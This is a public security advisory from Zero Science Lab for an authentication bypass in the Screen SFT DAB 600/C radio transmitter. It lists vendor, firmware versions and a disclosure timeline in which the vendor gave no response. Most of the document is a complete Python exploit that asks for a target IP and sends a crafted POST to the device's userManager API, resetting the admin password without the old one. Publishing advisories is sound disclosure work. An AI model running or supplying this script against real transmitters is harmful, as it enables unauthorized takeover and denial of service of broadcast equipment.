Title: Screen SFT DAB 600/C Authentication Bypass Erase Account Exploit
Advisory ID: ZSL-2023-5774
Type: Local/Remote
Impact: Privilege Escalation, Security Bypass, DoS
Risk: (4/5)
Release Date: 13.05.2023
Screen’s new radio DAB Transmitter is reaching the highest technology level in both Digital Signal Processing and RF domain. SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the digital adaptive precorrection and configuatio flexibility, the Hot Swap System technology, the compactness and the smart system design, the SFT DAB are advanced transmitters. They support standards DAB, DAB+ and T-DMB and are compatible with major headend brands.
This exploit circumvents the control and requirement of admin’s old password and directly changes the password.
DB Elettronica Telecomunicazioni SpA - <https://www.screen.it> | <https://www.dbbroadcast.com>
Firmware: 1.9.3
Bios firmware: 7.1 (Apr 19 2021)
Gui: 2.46
FPGA: 169.55
uc: 6.15
Keil-EWEB/2.1
MontaVista® Linux® Carrier Grade eXpress (CGX)
[19.03.2023] Vulnerability discovered.
[20.03.2023] Vendor contacted.
[12.05.2023] No response from the vendor.
[13.05.2023] Public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php>
[2] <https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php>
[3] <https://www.exploit-db.com/exploits/51458>
[4] <https://packetstormsecurity.com/files/172329>
[5] <https://cxsecurity.com/issue/WLB-2023050074>
[13.05.2023] - Initial release
[12.10.2023] - Added reference [3], [4] and [5]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>#!/usr/bin/env python3
#
#
# Screen SFT DAB 600/C Authentication Bypass Admin Password Change Exploit
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
# Bios firmware: 7.1 (Apr 19 2021)
# Gui: 2.46
# FPGA: 169.55
# uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: This exploit circumvents the control and requirement of admin's
# old password and directly changes the password.
#
# Tested on: Keil-EWEB/2.1
# MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5774
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php
#
#
# 19.03.2023
#
import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
'''
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
'''
+Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
'''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''
+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
p=input('Enter desired password: ')
e='/system/api/userManager.cgx'
m5=hashlib.md5()
m5.update(p.encode('utf-8'))
h=m5.hexdigest()
print('Your sig:',h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::changeUserPswd')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'ku-MK,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Dabber-+',
'Connection':'close'}
j={'ssbtIdx':0,
'ssbtType':'userManager',
'ssbtObj':{
'changeUserPswd':{
'username':'admin',
'password':h
}
},
}
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
print('Done.')
else:
print('Error')
exit(-2)
</p></body></html>